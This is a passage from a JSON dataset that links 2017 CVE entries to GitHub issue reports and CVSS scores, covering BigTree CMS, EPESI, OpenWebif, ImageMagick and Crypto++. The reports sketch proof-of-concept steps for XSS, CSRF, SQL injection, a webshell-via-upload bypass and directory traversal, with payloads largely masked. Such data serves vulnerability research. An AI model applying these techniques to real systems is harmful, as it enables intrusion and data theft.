  15504. "description": "Stored Cross site Scripting in Agenda APITAG tested on commit NUMBERTAG d NUMBERTAG Hi, I found a stored cross site scripting vulnerability in Agenda component. And i also tested it on github develop version(commit NUMBERTAG d NUMBERTAG it is vulnerable too. The POC is show below. Version : EPESI version NUMBERTAG re NUMBERTAG and develop version 'commit NUMBERTAG d NUMBERTAG FILETAG Login APITAG >CRM APITAG APITAG APITAG Title and Description APITAG FILETAG Back to Home > In Agenda section, when put your mouse cursor over Title, the script code will be excuted. FILETAG E Mail: EMAILTAG Discovered by: Huawei Weiran Labs",
  15505. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15506. "severity": "MEDIUM",
  15507. "baseScore": 5.4,
  15508. "impactScore": 2.7,
  15509. "exploitabilityScore": 2.3
  15510. },
  15511. {
  15512. "CVE_ID": "CVE-2017-9333",
  15513. "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/621",
  15514. "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/621",
  15515. "Repo_new": "e2openplugins/e2openplugin-openwebif",
  15516. "Issue_Created_At": "2017-06-26T18:33:24Z",
  15517. "description": "Bandit Output. As mentioned in another issue, this is the bandit's OWIF analysis report, I hope it helps you, I would appreciate if you would give me acknowledgement if you decide to fix those and sure this helps the vendors to upgrade to safer updated versions. Thank you Run started NUMBERTAG APITAG Test results: >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG return APITAG NUMBERTAG except Exception NUMBERTAG pass >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG class APITAG NUMBERTAG FN = PATHTAG NUMBERTAG def __init__(self, session): >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG BACKUP_PATH = \"/tmp NUMBERTAG BACKUP_FILENAME = APITAG >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: PATHTAG NUMBERTAG APITAG += \"%s \" % arg NUMBERTAG lines = popen(\"tar cvf %s %s\" % APITAG NUMBERTAG remove(checkfile) >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: PATHTAG NUMBERTAG check_tar = False NUMBERTAG lines = popen('tar tf %s' % APITAG NUMBERTAG for line in lines: >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: PATHTAG NUMBERTAG remove(bouquetfiles NUMBERTAG lines = popen('tar xvf %s C / exclude APITAG % APITAG NUMBERTAG APITAG >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. 
Severity: Low Confidence: High Location: PATHTAG NUMBERTAG wadd = week NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = mktime( APITAG APITAG APITAG + wadd NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG mode = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG oport = None NUMBERTAG if APITAG PATHTAG NUMBERTAG data = open( PATHTAG APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG if APITAG PATHTAG NUMBERTAG data = open( PATHTAG APITAG NUMBERTAG for i in data: >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG import glob NUMBERTAG tmpfiles = APITAG PATHTAG .ipk NUMBERTAG ipks = [] >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG def APITAG request NUMBERTAG APITAG = PATHTAG NUMBERTAG if APITAG >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. 
Severity: High Confidence: High Location: PATHTAG NUMBERTAG APITAG NUMBERTAG lines = popen( PATHTAG list | gzip > %s' % APITAG NUMBERTAG APITAG Disposition:\", \"attachment;filename= %s \" % APITAG NUMBERTAG Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG out = popen(\"opkg list NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a partial executable path Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG out = popen(\"opkg list NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG out = popen(\"opkg list installed NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a partial executable path Severity: Low Confidence: High Location: PATHTAG NUMBERTAG out = popen(\"opkg list installed NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG map[package NUMBERTAG out = popen(\"opkg list upgradable NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a partial executable path Severity: Low Confidence: High Location: PATHTAG NUMBERTAG map[package NUMBERTAG out = popen(\"opkg list upgradable NUMBERTAG for line in out: >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG import os NUMBERTAG FN = PATHTAG + filename NUMBERTAG fileh = os.open(FN, os. APITAG ) >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with the equivalent defusedxml package, or make sure APITAG is called. 
Severity: Low Confidence: High Location: PATHTAG NUMBERTAG from os import path, listdir NUMBERTAG import APITAG NUMBERTAG from APITAG import _ >> Issue: [B NUMBERTAG blacklist] Use of possibly insecure function consider using safer APITAG Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG cnf = eval(path NUMBERTAG if APITAG == APITAG or APITAG == APITAG or APITAG == APITAG >> Issue: [B NUMBERTAG blacklist] Use of possibly insecure function consider using safer APITAG Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG data = APITAG or NUMBERTAG text = APITAG \"\")) >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with its defusedxml equivalent function or make sure APITAG is called Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG setupfile = file(setupfile, 'r NUMBERTAG setupdom = APITAG NUMBERTAG APITAG >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG nic = str(nic NUMBERTAG except NUMBERTAG pass >> Issue: APITAG Possible binding to all interfaces. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG if ip is None or len(ip NUMBERTAG return NUMBERTAG return APITAG % (ip NUMBERTAG ip NUMBERTAG ip NUMBERTAG ip NUMBERTAG Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG ipaddress = list(tmpaddress NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG from APITAG import about NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. 
Severity: Low Confidence: High Location: PATHTAG NUMBERTAG imagever = APITAG NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG distro = APITAG APITAG all NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG imagebuild NUMBERTAG except NUMBERTAG just in case >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG imagever = APITAG NUMBERTAG except NUMBERTAG pass >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed dvb modules APITAG NUMBERTAG except: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed dvb proxy APITAG NUMBERTAG except: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed kernel core default gos APITAG NUMBERTAG except: >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed kernel core default gos APITAG NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. 
Severity: Low Confidence: High Location: PATHTAG NUMBERTAG filename = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG nextactivation = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with the equivalent defusedxml package, or make sure APITAG is called. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG import APITAG NUMBERTAG psfile = file(vpsfile, 'r') >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with its defusedxml equivalent function or make sure APITAG is called Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG psfile = file(vpsfile, 'r NUMBERTAG psdom = APITAG NUMBERTAG APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG returns APITAG if the image supports the function APITAG on without T NUMBERTAG f = open( PATHTAG \"r NUMBERTAG APITAG = APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG write APITAG to file so that the box will power on ONCE skipping the HDMI CEC communication NUMBERTAG f = open( PATHTAG \"w NUMBERTAG APITAG >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG timeout = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. 
Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG endtime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG endtime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG endtime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG mnow[\"sref\"] = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG time NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG return APITAG request NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG APITAG True NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. 
Severity: Low Confidence: High Location: PATHTAG NUMBERTAG APITAG servicetype, port NUMBERTAG except NUMBERTAG pass >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: . APITAG NUMBERTAG print APITAG compile %s > %s\" % (src, dest NUMBERTAG if os.system(\"msgfmt '%s' o '%s'\" % (src, dest NUMBERTAG raise Exception, APITAG to compile: \" + src Code scanned: Total lines of code NUMBERTAG Total lines skipped ( nosec NUMBERTAG Run metrics: Total issues (by severity): Undefined NUMBERTAG Low NUMBERTAG Medium NUMBERTAG High NUMBERTAG Total issues (by confidence): Undefined NUMBERTAG Low NUMBERTAG Medium NUMBERTAG High NUMBERTAG Files skipped NUMBERTAG",
  15518. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15519. "severity": "HIGH",
  15520. "baseScore": 8.8,
  15521. "impactScore": 5.9,
  15522. "exploitabilityScore": 2.8
  15523. },
  15524. {
  15525. "CVE_ID": "CVE-2017-9333",
  15526. "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/619",
  15527. "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/619",
  15528. "Repo_new": "e2openplugins/e2openplugin-openwebif",
  15529. "Issue_Created_At": "2017-06-20T14:02:01Z",
  15530. "description": "Remote code execution via APITAG improper input validation.. It was discovered that the APITAG class, specifically APITAG defined in PATHTAG does not restrict or incorrectly restricts the input package name before its included as param of PATHTAG package manager binary. A remote attacker could possibly use this flaw to pass a URL as package name parameter by a HTTP request to an attacker controlled repository since there is no signature verification.",
  15531. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15532. "severity": "HIGH",
  15533. "baseScore": 8.8,
  15534. "impactScore": 5.9,
  15535. "exploitabilityScore": 2.8
  15536. },
  15537. {
  15538. "CVE_ID": "CVE-2017-9364",
  15539. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/280",
  15540. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/280",
  15541. "Repo_new": "bigtreecms/bigtree-cms",
  15542. "Issue_Created_At": "2017-05-16T09:27:52Z",
  15543. "description": "Security hole for upload file bypass. ' Exploit Title: File Upload Bypass ' Vulnerability Type: Accessing, Modifying or Executing Executable Files (CAPEC NUMBERTAG Reporting Date NUMBERTAG Author: MENTIONTAG ' Vendor Homepage: FILETAG ' Software Link: URLTAG ' Version NUMBERTAG I. Abstract APITAG CMS is publicly licensed under the GNU Lesser General Public License It is an open source content management system built on PHP and APITAG II. Introduction NUMBERTAG Accessing, Modifying or Executing Executable Files An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface NUMBERTAG ulnerability analysis for bigtree cms At the file PATHTAG line NUMBERTAG ar APITAG = APITAG The code of Regular expression shows that i could be bypassed by upload a file sometime, the lamp environment install on ubuntu and debian with apt get can Resolved to pht and phtml\uff0cso wo can bypass to upload a file in URLTAG upload file Name xxx.pht or APITAG Then the attacker could get a webshell by using this method the webshell url \uff1a FILETAG NUMBERTAG Solution Use white lists instead of black lists thank you",
  15544. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15545. "severity": "CRITICAL",
  15546. "baseScore": 9.8,
  15547. "impactScore": 5.9,
  15548. "exploitabilityScore": 3.9
  15549. },
  15550. {
  15551. "CVE_ID": "CVE-2017-9365",
  15552. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/281",
  15553. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/281",
  15554. "Repo_new": "bigtreecms/bigtree-cms",
  15555. "Issue_Created_At": "2017-05-17T05:20:41Z",
  15556. "description": "CSRF exists in APITAG CMS Less than NUMBERTAG CSRF exists in APITAG CMS Less than NUMBERTAG with the force parameter to the PATHTAG For example: URLTAG A page with id NUMBERTAG can be unlocked. you my be use APITAG function. thank you !",
  15557. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15558. "severity": "HIGH",
  15559. "baseScore": 8.8,
  15560. "impactScore": 5.9,
  15561. "exploitabilityScore": 2.8
  15562. },
  15563. {
  15564. "CVE_ID": "CVE-2017-9366",
  15565. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/196",
  15566. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/196",
  15567. "Repo_new": "Telaxus/EPESI",
  15568. "Issue_Created_At": "2017-05-31T08:30:18Z",
  15569. "description": "Stored Cross site Scripting in Tab APITAG tested on commit c1d NUMBERTAG a7). Hi, I found a stored cross site scripting vulnerability in the tab_name parameter. And I also test it on github latest develop version(commit c1d NUMBERTAG a7), it is vulnerable too. The POC is show below. Administrator Login APITAG APITAG APITAG Dashboard APITAG APITAG new Tab APITAG crafted lable APITAG FILETAG When other Administrator Login to the Dashboard, the script code will be executed. FILETAG E Mail: EMAILTAG Discovered by: Huawei Weiran Labs",
  15570. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  15571. "severity": "MEDIUM",
  15572. "baseScore": 4.8,
  15573. "impactScore": 2.7,
  15574. "exploitabilityScore": 1.7
  15575. },
  15576. {
  15577. "CVE_ID": "CVE-2017-9378",
  15578. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/282",
  15579. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/282",
  15580. "Repo_new": "bigtreecms/bigtree-cms",
  15581. "Issue_Created_At": "2017-05-17T05:41:21Z",
  15582. "description": "design flaw in APITAG CMS Less than NUMBERTAG There is two design flaw in APITAG CMS Less than NUMBERTAG one. the administrator level user can delete another administrator level user, resulting in malicious delete. the current user can only delete users who have less privileges than him. two. the current user can delete himself Bypass system APITAG system is disabled by default\uff09. the current user may net delete himself. the Flawed code: PATHTAG APITAG PATHTAG ERRORTAG",
  15583. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  15584. "severity": "MEDIUM",
  15585. "baseScore": 6.5,
  15586. "impactScore": 3.6,
  15587. "exploitabilityScore": 2.8
  15588. },
  15589. {
  15590. "CVE_ID": "CVE-2017-9379",
  15591. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/287",
  15592. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/287",
  15593. "Repo_new": "bigtreecms/bigtree-cms",
  15594. "Issue_Created_At": "2017-06-02T09:06:56Z",
  15595. "description": "Multiple Security Issue of CSRF exists in APITAG CMS Less than NUMBERTAG Multiple Security Issue of CSRF exists in APITAG CMS Less than NUMBERTAG one with the clear parameter to the PATHTAG ERRORTAG FILETAG poc: ERRORTAG request FILETAG then you will clear ERRORTAG report tow with the from and to parameter to the PATHTAG ERRORTAG FILETAG poc: ERRORTAG request FILETAG then you will create one NUMBERTAG Redirect you my be use APITAG function. thank you !",
  15596. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15597. "severity": "HIGH",
  15598. "baseScore": 8.8,
  15599. "impactScore": 5.9,
  15600. "exploitabilityScore": 2.8
  15601. },
  15602. {
  15603. "CVE_ID": "CVE-2017-9405",
  15604. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/457",
  15605. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/457",
  15606. "Repo_new": "imagemagick/imagemagick",
  15607. "Issue_Created_At": "2017-04-28T04:00:47Z",
  15608. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG bc NUMBERTAG fb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG eb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
  15609. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15610. "severity": "MEDIUM",
  15611. "baseScore": 6.5,
  15612. "impactScore": 3.6,
  15613. "exploitabilityScore": 2.8
  15614. },
  15615. {
  15616. "CVE_ID": "CVE-2017-9407",
  15617. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/459",
  15618. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/459",
  15619. "Repo_new": "imagemagick/imagemagick",
  15620. "Issue_Created_At": "2017-04-28T04:02:12Z",
  15621. "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG f7b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG f2c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
  15622. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15623. "severity": "MEDIUM",
  15624. "baseScore": 6.5,
  15625. "impactScore": 3.6,
  15626. "exploitabilityScore": 2.8
  15627. },
  15628. {
  15629. "CVE_ID": "CVE-2017-9409",
  15630. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/458",
  15631. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/458",
  15632. "Repo_new": "imagemagick/imagemagick",
  15633. "Issue_Created_At": "2017-04-28T04:01:21Z",
  15634. "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c NUMBERTAG d9 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG b2c NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
  15635. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15636. "severity": "MEDIUM",
  15637. "baseScore": 6.5,
  15638. "impactScore": 3.6,
  15639. "exploitabilityScore": 2.8
  15640. },
  15641. {
  15642. "CVE_ID": "CVE-2017-9416",
  15643. "Issue_Url_old": "https://github.com/odoo/odoo/issues/17394",
  15644. "Issue_Url_new": "https://github.com/odoo/odoo/issues/17394",
  15645. "Repo_new": "odoo/odoo",
  15646. "Issue_Created_At": "2017-06-02T23:38:19Z",
  15647. "description": "reserved .",
  15648. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  15649. "severity": "MEDIUM",
  15650. "baseScore": 6.5,
  15651. "impactScore": 3.6,
  15652. "exploitabilityScore": 2.8
  15653. },
  15654. {
  15655. "CVE_ID": "CVE-2017-9427",
  15656. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/288",
  15657. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/288",
  15658. "Repo_new": "bigtreecms/bigtree-cms",
  15659. "Issue_Created_At": "2017-06-03T12:03:16Z",
  15660. "description": "SQL injection in bigtreecms NUMBERTAG SQL injection in bigtreecms NUMBERTAG show me the code: file PATHTAG APITAG continue the function APITAG file PATHTAG ERRORTAG here the $_POST[\"table\"] to $table to sqlescape($table)\uff0c final INSERT INTO database table bigtree_module_forms. continue file PATHTAG CODETAG continue\uff0c at APITAG function SELECT FROM bigtree_module_forms ERRORTAG at here, $admin APITAG to $modules to $m, final sqlquery(\"SELECT id FROM APITAG \") POC\uff1a one step\uff0ccreate module xfkxfk\uff0c on url\uff1a URLTAG two step\uff0c create module xfkxfk2\uff0cbut the table name is\uff1axfkxfk APITAG where NUMBERTAG and APITAG APITAG )\uff0c on url\uff1a URLTAG three step\uff0c request the url\uff0csql inject here\uff1a URLTAG email : EMAILTAG",
  15661. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  15662. "severity": "HIGH",
  15663. "baseScore": 8.8,
  15664. "impactScore": 5.9,
  15665. "exploitabilityScore": 2.8
  15666. },
  15667. {
  15668. "CVE_ID": "CVE-2017-9428",
  15669. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/289",
  15670. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/289",
  15671. "Repo_new": "bigtreecms/bigtree-cms",
  15672. "Issue_Created_At": "2017-06-04T07:05:02Z",
  15673. "description": "Directory Traversal in bigtreecms NUMBERTAG Directory Traversal in bigtreecms NUMBERTAG FILE: PATHTAG at here, just filter .. and /, but we can use \\ bypass on windows POC: > POST PATHTAG HTTP NUMBERTAG Host: localhost > User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: text/html, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG > Accept Encoding: gzip, deflate > Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG > Referer: URLTAG > Content Length NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG hide_bigtree_bar= > Connection: keep alive > > PATHTAG email : EMAILTAG",
  15674. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  15675. "severity": "HIGH",
  15676. "baseScore": 7.5,
  15677. "impactScore": 3.6,
  15678. "exploitabilityScore": 3.9
  15679. },
  15680. {
  15681. "CVE_ID": "CVE-2017-9434",
  15682. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/414",
  15683. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/414",
  15684. "Repo_new": "weidai11/cryptopp",
  15685. "Issue_Created_At": "2017-05-10T21:00:45Z",
  15686. "description": "Zinflate and APITAG finding. We started fuzzing library classes. Its dumb fuzzing, and all we do is generate a random string and send it into a filter like Inflator or ERRORTAG . It looks like Inflator is having some trouble. The assert below was added when we noticed some odd behavior. ERRORTAG Running under Address Sanitizer results in: ERRORTAG",
  15687. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  15688. "severity": "MEDIUM",
  15689. "baseScore": 5.3,
